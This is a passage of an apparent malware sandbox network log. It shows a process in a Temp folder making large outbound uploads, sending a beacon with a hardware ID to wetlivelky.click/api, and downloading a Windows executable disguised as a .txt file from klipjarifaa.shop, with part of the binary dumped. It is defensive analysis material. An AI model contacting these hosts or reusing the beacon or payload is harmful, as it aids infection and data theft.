                                                                                            Data Ascii: E0VGo$?zRf@9#w_56~s9UK*Bd_QgJd\/~#}'[lxmUVw_?U-]*%B6RY"N<Leo7"pNBNry<A9@O]>PeS!iQOzJ:O/
                                                                                            2024-12-27 09:11:59 UTC15331OUTData Raw: 4e 5d f5 87 d1 50 9c 93 c8 6b 6f 9e 50 78 ad 69 8d 47 a9 29 45 45 b2 07 84 eb f9 72 45 70 8a 7e 4a 07 b9 b9 d1 21 8e d0 2b d9 75 d2 ca e7 a5 35 1a 56 2c a9 39 d7 54 e4 b7 9b c4 18 34 d4 55 75 2b a1 be 33 f2 9e 98 c5 5e 11 97 09 3e 54 6b 25 09 4e dc 68 bc b4 e3 2d 30 e7 b8 37 9a ed 08 7d ed 87 cf f7 d7 cf 6c 8e fc e8 d3 93 62 cb 6b 34 d2 66 5a f6 6b 8f 46 c4 c6 a4 31 78 42 a1 78 79 d7 2f f7 2b 57 cb 54 00 cd 55 65 70 7a 09 32 ab 0e b7 cb 51 51 c5 cf 87 b6 af ac f9 8d b6 6d 58 56 b4 ac bd de 74 8b 8b ac 5b 57 3b c8 93 a8 a2 32 d0 b8 11 ef 71 48 24 cd 90 8b da 06 ec 4d f3 34 43 7f 8e 8e 72 db 80 16 04 ff 7d 4f c5 61 92 69 05 27 e4 47 b4 68 f3 dd c1 55 ef 74 92 43 5e 2d 57 86 d3 3a c5 93 78 18 10 2f 10 5b 1c 44 11 da 42 73 d6 20 be 42 03 bc 73 15 1a 2d b0 8e
                                                                                            Data Ascii: N]PkoPxiG)EErEp~J!+u5V,9T4Uu+3^>Tk%Nh-07}lbk4fZkF1xBxy/+WTUepz2QQmXVt[W;2qH$M4Cr}Oai'GhUtC^-W:x/[DBs Bs-
                                                                                            2024-12-27 09:11:59 UTC15331OUTData Raw: 36 f0 64 db 2a 3c 88 38 cc b4 e8 56 79 9d 96 23 b1 29 26 3d 1d 52 b2 85 dd da 9b 32 62 b1 37 f3 06 be ac c1 44 66 02 9a 1f be c7 08 5c 74 95 0f d5 77 6e ad 31 f6 c4 88 9c a9 42 e0 bc 54 72 cc a2 78 6b c8 e3 d4 b1 d9 e4 6a 87 03 5e 13 7d 6a 85 e9 05 a2 33 64 a4 f9 24 df f7 22 5f c1 be 18 2f 75 9d ec 5d ca ea 18 55 c0 0b 89 8a 32 d7 e6 53 0b b1 fd fe 99 2e 36 93 02 87 75 9a bd 7d b7 f6 09 25 27 ec cd d3 e1 f2 e9 25 42 46 9e a0 f8 d0 c8 0e 90 b9 70 8e d9 c0 38 74 d9 23 d6 14 cb 9a fa 58 f0 a9 b2 0b 72 4b 09 13 40 8e b0 23 7e c5 3f 21 d2 08 d8 c5 5c 9e a9 81 69 a0 46 25 6c 72 7a 26 a7 19 07 f6 ab b5 db c3 8f c1 8c 62 f5 7f 8c 92 d6 e0 c9 d6 2b 3c 81 7b 01 0b aa f2 bd 48 a4 f9 91 53 95 33 d5 c3 07 5e e9 ee fa ea dc 3b dd 9a 56 72 e7 3f 3a 44 77 a5 98 84 83 c5
                                                                                            Data Ascii: 6d*<8Vy#)&=R2b7Df\twn1BTrxkj^}j3d$"_/u]U2S.6u}%'%BFp8t#XrK@#~?!\iF%lrz&b+<{HS3^;Vr?:Dw
                                                                                            2024-12-27 09:11:59 UTC15331OUTData Raw: 4a 8b e1 b3 fe bb 55 c6 a5 73 5d fd 7f 5f b9 5b fa ad f6 9f 57 77 ca f6 95 2e 4d ea ee 26 70 7b 5b ff ae e2 fe 19 de 43 d8 58 4a 6b c5 2e be 52 06 3d 69 02 83 14 18 16 11 30 a9 da bc 2e 0a d2 18 60 b1 6e fc f7 21 90 8d 82 99 da 99 5a 38 0b 40 c8 86 50 08 84 38 58 17 87 72 5e 0f a8 fd 3a 8d e4 85 52 70 72 cb ec 83 3d 06 08 5e b8 28 7e 78 3f 21 6b f3 62 7f fa 47 8d ef 3b 45 4c d1 e1 30 fc ac e9 f2 72 77 77 e5 9f 85 ab a2 a9 61 6c c3 1c b3 0f 31 2c 6f ef 0d f7 17 8f 20 52 86 17 fd 10 98 b5 f6 16 06 22 82 d8 16 c9 ed e6 88 bc e5 f5 92 47 cd b7 2f 8b 6a e2 79 29 b6 ff e8 d2 c3 0b 9e f8 b6 7f e0 55 79 a8 4b 0e 96 87 ee 94 82 20 0c 7c 08 83 7f b7 0b 2f 80 f8 33 95 9e 2d 68 33 56 e5 c7 47 3f fe 76 3c 5d 00 5c fa c1 8e fd 01 0a 5b 88 35 95 49 41 38 1b eb 49 ce ad
                                                                                            Data Ascii: JUs]_[Ww.M&p{[CXJk.R=i0.`n!Z8@P8Xr^:Rpr=^(~x?!kbG;EL0rwwal1,o R"G/jy)UyK |/3-h3VG?v<]\[5IA8I
                                                                                            2024-12-27 09:11:59 UTC15331OUTData Raw: 92 71 b4 ca 9f 9d 0c e2 86 18 61 46 ac 82 f8 cd 49 7e 30 c2 b7 4a ba 33 71 74 a3 2f 23 e7 3f d7 f2 bb 8c e0 62 d6 cd bb 06 73 11 f3 4a 77 b8 39 82 83 05 5f 76 a7 fd 30 b9 6f b7 e1 bd 58 da 96 a6 94 d2 1a 5a 53 e1 72 e9 d2 e6 26 9b c5 b9 1f 6f c6 d1 67 1c 9d 5b b6 08 9c 90 82 7b 2d 24 ba 01 35 46 e2 7f c1 63 36 b8 9c f9 98 c0 b2 1c 39 12 c9 99 2d 9f 70 75 19 9c 29 5f ee 5e e1 20 15 15 43 ca d8 2c 94 16 96 36 99 f2 d4 bf 64 41 09 b7 a6 29 10 83 b1 e4 23 f1 59 96 36 11 24 09 59 bf 08 e7 06 90 7a 15 5b 3b 2c 2a dc 7f 2f 28 b4 56 52 8e 10 12 8b be 31 e2 08 32 9a 1b 9c 73 c0 66 68 04 da 75 ad 16 e6 7d c9 b8 84 c5 c7 bf 7f 2c 08 0f 0b 42 7f d2 e8 ee c1 9f 85 18 ab fe 33 5b 13 fe a7 aa f8 82 cf f4 04 34 dd fa 96 36 f2 df 97 89 0d cd d6 03 43 dc 91 63 af c0 e2 d8
                                                                                            Data Ascii: qaFI~0J3qt/#?bsJw9_v0oXZSr&og[{-$5Fc69-pu)_^ C,6dA)#Y6$Yz[;,*/(VR12sfhu},B3[46Cc
                                                                                            2024-12-27 09:11:59 UTC15331OUTData Raw: a5 a9 1f 13 75 46 57 2f ba 25 06 61 ba 82 be d6 30 c1 ca ee 19 9b 7a fb b6 75 c7 53 bf fe d4 d5 fe bd 2d c8 2e 7f 81 47 14 1d 79 33 21 e4 dd 08 ca eb d2 e8 a4 e5 1b 61 70 12 da ab 35 6d f4 59 75 8a 50 c0 c2 b7 0c ca cc c2 2e 4c 8d 13 f9 26 6a 17 ea db 2a 4d 8e b0 ec 4f bd 06 bc 7e 24 ec 8f e0 e7 18 a0 9b 0b 2d a3 18 9c b2 3c b4 0b 5f 7e 82 9a c7 c6 40 3e 95 c8 26 45 57 dd 45 db d1 b3 8d 00 0e 2b b5 8d 14 db 9d b2 8b a7 da 2a 38 5a 82 35 c0 42 bf d6 5f bc 72 d9 4f 3b ba ee f6 10 19 96 6f 80 30 78 bc 90 e2 e5 b7 2a ca f7 1a ec 75 67 76 ad bd 50 15 7a 6c ac 73 3f 2a fd 02 eb 08 52 75 56 03 9f ba 6e 9b b7 f1 cc 0f 6f d3 cd 8f 53 3d 9f c7 52 3c fc de 15 d0 32 70 06 8b e3 23 1b 27 f8 ad 3f 86 d1 ba 24 4c be 7f 13 6b 65 77 46 13 ca f8 7c d6 f5 f5 78 84 49 53 34
                                                                                            Data Ascii: uFW/%a0zuS-.Gy3!ap5mYuP.L&j*MO~$-<_~@>&EWE+*8Z5B_rO;o0x*ugvPzls?*RuVnoS=R<2p#'?$LkewF|xIS4
                                                                                            2024-12-27 09:11:59 UTC15331OUTData Raw: 68 e5 3c ae 77 3a 45 1d aa fa 46 2e 81 2c 2b 65 30 b3 75 c6 d0 46 f5 14 19 99 e6 d0 46 45 8d f2 5c 33 61 4e ab 9b 76 fe d9 6f 7d 49 a8 36 89 e2 34 19 41 29 c3 bc 12 71 c8 bb 4c ae 0d 93 85 b6 c8 7c aa 14 02 22 76 45 81 84 a3 2c ce ba ff 18 91 dd 17 d3 1e 5a 8a 6b ae 0b c8 7f c5 40 e7 ec 52 2c ff 77 9c 94 fd 51 69 ed 9b 1c ed db f2 e9 01 b6 88 72 04 83 3c ff eb 22 ae 30 d9 8a 59 e3 dd 8f 52 dd d3 1f 52 24 dd a7 3b b5 cc 72 a8 cb 8a b4 af 7d a7 52 4e 60 fd c8 4c 29 2d 3a 4f 6c fa 56 de ad 1c 56 e8 a7 2d d9 ff 4e 98 39 31 bf 1d 90 9c 62 43 71 5f 2d 4e 85 0f fc eb 65 b0 67 f9 43 dd ec 8b d9 c8 f7 d2 8d 5e e1 2f 17 ab f5 66 dc 95 67 2d ff 41 9f fd 07 ed 1a 21 35 5b 2d da b1 f6 8d d5 37 53 9a f6 b1 2f e0 89 74 61 de 74 cc b1 5b 27 5d 82 f6 ba 9d 57 b4 12 e8 00
                                                                                            Data Ascii: h<w:EF.,+e0uFFE\3aNvo}I64A)qL|"vE,Zk@R,wQir<"0YRR$;r}RN`L)-:OlVV-N91bCq_-NegC^/fg-A!5[-7S/tat[']W
                                                                                            2024-12-27 09:12:01 UTC1131INHTTP/1.1 200 OK
                                                                                            Date: Fri, 27 Dec 2024 09:12:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=fg35h6nu3hj17i4qhvln0buu4t; expires=Tue, 22 Apr 2025 02:58:40 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zleb1R%2BspZ1OS5jiyMTrmU5tMFPLpL5rPWVVY%2F6Zaj7JCS1L9OlhGcGGWvCC93NNLH83ohR9%2F4omRaCL5NGy3GL4m6e4fvZRZx5g33uyp13kO7%2BhuFtfSKyCgla23TgDe0hQ"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8f882fb34e837290-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1954&rtt_var=762&sent=358&recv=613&lost=0&retrans=0&sent_bytes=2840&recv_bytes=594338&delivery_rate=1409266&cwnd=249&unsent_bytes=0&cid=0231b14a571f149c&ts=2508&x=0"


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.449758104.21.25.414436636C:\Users\user\AppData\Local\Temp\174436\Produces.com
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-27 09:12:02 UTC264OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 82
                                                                                            Host: wetlivelky.click
                                                                                            2024-12-27 09:12:02 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 58 47 44 52 2d 2d 4c 69 6c 6c 79 4c 26 6a 3d 26 68 77 69 64 3d 33 31 32 34 35 41 44 30 42 46 39 37 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                            Data Ascii: act=get_message&ver=4.0&lid=VXGDR--LillyL&j=&hwid=31245AD0BF977FF1BEBA0C6A975F1733
                                                                                            2024-12-27 09:12:03 UTC1131INHTTP/1.1 200 OK
                                                                                            Date: Fri, 27 Dec 2024 09:12:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=4ka43v2b19sf769mlsp39n08c6; expires=Tue, 22 Apr 2025 02:58:42 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vZqTqtD%2FIVxjuocXNOsqac4%2BINMz2X7G%2B29m6zgWYFpxNZCzXob45iYoD%2FfatCZJRWlTKj2KvfjoqEfzm6tLcsW5Mf%2B7xtbj9Di3Snt71%2Fw6tZQwZ5%2Fj2ZR46jyqh3cy%2Fjan"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8f882fcb5ed04376-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2085&min_rtt=2080&rtt_var=790&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=982&delivery_rate=1376709&cwnd=248&unsent_bytes=0&cid=f9c90e854889333d&ts=776&x=0"
                                                                                            2024-12-27 09:12:03 UTC138INData Raw: 38 34 0d 0a 63 61 56 6c 73 6c 78 63 70 52 68 6d 6f 4f 53 2f 30 42 42 4a 4f 43 72 46 4f 6e 6c 77 67 51 39 6a 4f 65 2b 51 34 68 79 65 59 4b 41 71 33 6b 66 48 66 6d 61 48 63 42 4c 55 6c 4d 7a 71 54 47 5a 6b 42 61 35 57 45 41 44 72 62 68 46 51 69 66 47 44 4d 75 30 49 7a 77 48 35 53 74 73 79 4b 50 70 37 43 74 43 37 7a 36 4a 2f 4c 78 5a 65 76 55 35 62 58 4b 4e 70 46 78 76 56 6f 4d 34 2b 2b 30 4b 61 51 64 67 34 0d 0a
                                                                                            Data Ascii: 84caVlslxcpRhmoOS/0BBJOCrFOnlwgQ9jOe+Q4hyeYKAq3kfHfmaHcBLUlMzqTGZkBa5WEADrbhFQifGDMu0IzwH5StsyKPp7CtC7z6J/LxZevU5bXKNpFxvVoM4++0KaQdg4
                                                                                            2024-12-27 09:12:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.449763104.21.74.2354436636C:\Users\user\AppData\Local\Temp\174436\Produces.com
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-27 09:12:05 UTC207OUTGET /int_clp_prof.txt HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Host: klipjarifaa.shop
                                                                                            2024-12-27 09:12:06 UTC900INHTTP/1.1 200 OK
                                                                                            Date: Fri, 27 Dec 2024 09:12:05 GMT
                                                                                            Content-Type: text/plain
                                                                                            Content-Length: 11728114
                                                                                            Connection: close
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "1dbac9190f7c834bbb99ce9010475856"
                                                                                            Last-Modified: Thu, 26 Dec 2024 20:09:18 GMT
                                                                                            Vary: Accept-Encoding
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9BhMX1kriPuHPemuFJYEOifjlUS%2FGyRK2oXLQEuW%2BcArYqPqWhneihUKKc8xYPCp644YoWupDaLU0smko3eH9lIqF8iQPQRIkkHzbmcP3a4REljlFbTabzF8gGZv9YdMhlJE"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8f882fd9ebe68c0b-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1981&rtt_var=746&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2866&recv_bytes=821&delivery_rate=1462925&cwnd=210&unsent_bytes=0&cid=e5b2e581eda5a65f&ts=942&x=0"
                                                                                            2024-12-27 09:12:06 UTC1369INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                            2024-12-27 09:12:06 UTC1369INData Raw: 09 4e 61 74 69 76 65 49 6e 74 04 00 00 00 80 ff ff ff 7f 02 00 00 00 74 11 40 00 01 0a 4e 61 74 69 76 65 55 49 6e 74 05 00 00 00 00 ff ff ff ff 02 00 00 90 11 40 00 04 06 53 69 6e 67 6c 65 00 02 00 00 a0 11 40 00 04 08 45 78 74 65 6e 64 65 64 02 02 00 00 00 00 b4 11 40 00 04 06 44 6f 75 62 6c 65 01 02 00 00 c4 11 40 00 04 04 43 6f 6d 70 03 02 00 00 00 00 d4 11 40 00 04 08 43 75 72 72 65 6e 63 79 04 02 00 00 00 00 e8 11 40 00 05 0b 53 68 6f 72 74 53 74 72 69 6e 67 ff 02 00 fc 11 40 00 14 09 50 41 6e 73 69 43 68 61 72 30 10 40 00 02 00 00 00 00 14 12 40 00 14 09 50 57 69 64 65 43 68 61 72 4c 10 40 00 02 00 00 00 00 2c 12 40 00 03 08 42 79 74 65 42 6f 6f 6c 00 00 00 00 80 ff ff ff 7f 28 12 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00
                                                                                            Data Ascii: NativeIntt@NativeUInt@Single@Extended@Double@Comp@Currency@ShortString@PAnsiChar0@@PWideCharL@,@ByteBool(@FalseTrueSystem
                                                                                            2024-12-27 09:12:06 UTC1369INData Raw: 00 02 00 0b 28 9c 4a 00 0c 26 6f 70 5f 4c 65 73 73 54 68 61 6e 00 00 00 10 40 00 02 12 98 15 40 00 04 4c 65 66 74 02 00 12 98 15 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 13 26 6f 70 5f 4c 65 73 73 54 68 61 6e 4f 72 45 71 75 61 6c 00 00 00 10 40 00 02 12 98 15 40 00 04 4c 65 66 74 02 00 12 98 15 40 00 05 52 69 67 68 74 02 00 02 00 7c 17 40 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 1f 40 00 00 00 00 00 7c 17 40 00 00 00 00 00 92 18 40 00 08 00 00 00 00 00 00 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 22 00 9a 18 40 00 44 00 f4 ff c0 18 40 00 42 00 f4 ff e4 18 40 00 42 00 f4 ff 0d 19 40 00 43 00 f4 ff 4b 19 40 00 42 00 f4 ff 7a 19 40 00 42 00 f4 ff a3
                                                                                            Data Ascii: (J&op_LessThan@@Left@Right(J&op_LessThanOrEqual@@Left@Right|@@|@@~@@@@@@@@}@}@}@"@D@B@B@CK@Bz@B
                                                                                            2024-12-27 09:12:06 UTC1369INData Raw: 41 64 64 72 65 73 73 03 00 00 11 40 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 04 4e 61 6d 65 02 00 02 00 46 00 04 7f 40 00 0c 47 65 74 49 6e 74 65 72 66 61 63 65 03 00 00 10 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 12 40 13 40 00 01 00 03 49 49 44 02 00 20 00 00 00 00 02 00 03 4f 62 6a 02 00 02 00 3e 00 68 7f 40 00 11 47 65 74 49 6e 74 65 72 66 61 63 65 45 6e 74 72 79 03 00 a0 14 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 40 13 40 00 01 00 03 49 49 44 02 00 02 00 31 00 28 9c 4a 00 11 47 65 74 49 6e 74 65 72 66 61 63 65 54 61 62 6c 65 03 00 2c 15 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 ac 7f 40 00 08 55 6e 69 74 4e 61 6d 65 03 00 b8 12 40 00 08 00 02 00 00 00 00
                                                                                            Data Ascii: Address@@Self@NameF@GetInterface@@Self@@IID Obj>h@GetInterfaceEntry@Self@@IID1(JGetInterfaceTable,@Self3@UnitName@
                                                                                            2024-12-27 09:12:06 UTC1369INData Raw: 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 00 00 00 00 0f 55 6e 73 61 66 65 41 74 74 72 69 62 75 74 65 00 00 94 21 40 00 07 0f 55 6e 73 61 66 65 41 74 74 72 69 62 75 74 65 78 21 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 18 22 40 00 00 00 00 00 00 00 00 00 00 00 00 00 34 22 40 00 00 00 00 00 18 22 40 00 00 00 00 00 1e 22 40 00 08 00 00 00 c4 1f 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 00 00 00 00 11 56 6f 6c 61 74 69 6c 65 41 74 74 72 69 62 75 74 65 34 22 40 00 07 11 56 6f 6c 61 74 69 6c 65 41 74 74 72 69 62 75 74 65 18 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 b8 22 40
                                                                                            Data Ascii: @@}@}@}@UnsafeAttribute!@UnsafeAttributex!@4 @System"@4"@"@"@@~@@@@@@@@}@}@}@VolatileAttribute4"@VolatileAttribute"@4 @System"@
                                                                                            2024-12-27 09:12:06 UTC1369INData Raw: 74 02 00 02 00 09 e8 89 40 00 08 50 75 6c 73 65 41 6c 6c 00 00 00 00 00 00 01 0a 9c 1f 40 00 07 41 4f 62 6a 65 63 74 02 00 02 00 ec 26 40 00 0f 0a 49 49 6e 74 65 72 66 61 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 20 27 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 e8 26 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65 6d 01 00 ff ff 02 00 00 54 27 40 00 0f 09 49 44 69 73 70 61 74 63 68 e8 26 40 00 01 00 04 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 04 00 ff ff 02 00 00 00 00 cc 83 44 24 04 f8 e9 81 ca 00 00 83 44 24 04 f8 e9 9f ca 00 00 83 44 24 04 f8 e9 b1 ca 00 00 cc 85 27 40 00 8f 27 40 00 99 27 40 00 01 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: t@PulseAll@AObject&@IInterfaceFSystem '@IEnumerable&@SystemT'@IDispatch&@FSystemD$D$D$'@'@'@
                                                                                            2024-12-27 09:12:06 UTC1369INData Raw: 6f 75 6e 74 02 00 cc 10 40 00 02 00 00 00 02 05 46 6c 61 67 73 02 00 9c 10 40 00 04 00 00 00 02 0b 45 6c 65 6d 65 6e 74 53 69 7a 65 02 00 9c 10 40 00 08 00 00 00 02 09 4c 6f 63 6b 43 6f 75 6e 74 02 00 00 11 40 00 0c 00 00 00 02 04 44 61 74 61 02 00 a8 2b 40 00 10 00 00 00 02 06 42 6f 75 6e 64 73 02 00 02 00 00 00 00 84 2c 40 00 0e 0a 54 56 61 72 52 65 63 6f 72 64 08 00 00 00 00 00 00 00 00 02 00 00 00 00 11 40 00 00 00 00 00 02 07 50 52 65 63 6f 72 64 02 00 00 11 40 00 04 00 00 00 02 07 52 65 63 49 6e 66 6f 02 00 02 00 00 00 00 cc 2c 40 00 0e 08 54 56 61 72 44 61 74 61 10 00 00 00 00 00 00 00 00 20 00 00 00 cc 10 40 00 00 00 00 00 02 05 56 54 79 70 65 02 00 cc 10 40 00 02 00 00 00 02 09 52 65 73 65 72 76 65 64 31 02 00 cc 10 40 00 04 00 00 00 02 09 52 65
                                                                                            Data Ascii: ount@Flags@ElementSize@LockCount@Data+@Bounds,@TVarRecord@PRecord@RecInfo,@TVarData @VType@Reserved1@Re
                                                                                            2024-12-27 09:12:06 UTC1369INData Raw: 40 00 00 00 00 00 02 08 56 56 61 72 69 61 6e 74 02 00 00 11 40 00 00 00 00 00 02 0a 56 49 6e 74 65 72 66 61 63 65 02 00 00 11 40 00 00 00 00 00 02 0b 56 57 69 64 65 53 74 72 69 6e 67 02 00 b4 2a 40 00 00 00 00 00 02 06 56 49 6e 74 36 34 02 00 00 11 40 00 00 00 00 00 02 0e 56 55 6e 69 63 6f 64 65 53 74 72 69 6e 67 02 00 54 11 40 00 00 00 00 00 02 0a 5f 52 65 73 65 72 76 65 64 31 02 00 b4 10 40 00 04 00 00 00 02 05 56 54 79 70 65 02 00 02 00 00 00 00 00 00 0c 32 40 00 0e 0b 54 50 74 72 57 72 61 70 70 65 72 04 00 00 00 00 00 00 00 00 01 00 00 00 a0 2a 40 00 00 00 00 00 00 05 56 61 6c 75 65 02 00 02 00 06 00 0a 28 9c 4a 00 06 43 72 65 61 74 65 00 00 00 00 00 00 01 00 54 11 40 00 06 41 56 61 6c 75 65 02 00 02 00 0a c0 f5 40 00 06 43 72 65 61 74 65 00 00 00 00
                                                                                            Data Ascii: @VVariant@VInterface@VWideString*@VInt64@VUnicodeStringT@_Reserved1@VType2@TPtrWrapper*@Value(JCreateT@AValue@Create
                                                                                            2024-12-27 09:12:06 UTC1369INData Raw: 28 9c 4a 00 0a 52 65 61 6c 6c 6f 63 4d 65 6d 03 00 08 32 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 08 32 40 00 01 00 06 4f 6c 64 50 74 72 02 00 00 54 11 40 00 02 00 07 4e 65 77 53 69 7a 65 02 00 02 00 34 00 28 9c 4a 00 07 46 72 65 65 4d 65 6d 03 00 00 00 00 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 08 32 40 00 01 00 03 50 74 72 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 cc 4b 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66
                                                                                            Data Ascii: (JReallocMem2@Self2@OldPtrT@NewSize4(JFreeMemSelf2@Ptrb(JCopySelfK@Src@StartIndex2@Dest@Countb(JCopySelf
                                                                                            2024-12-27 09:12:06 UTC1369INData Raw: 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 28 4d 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 60 4d 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53
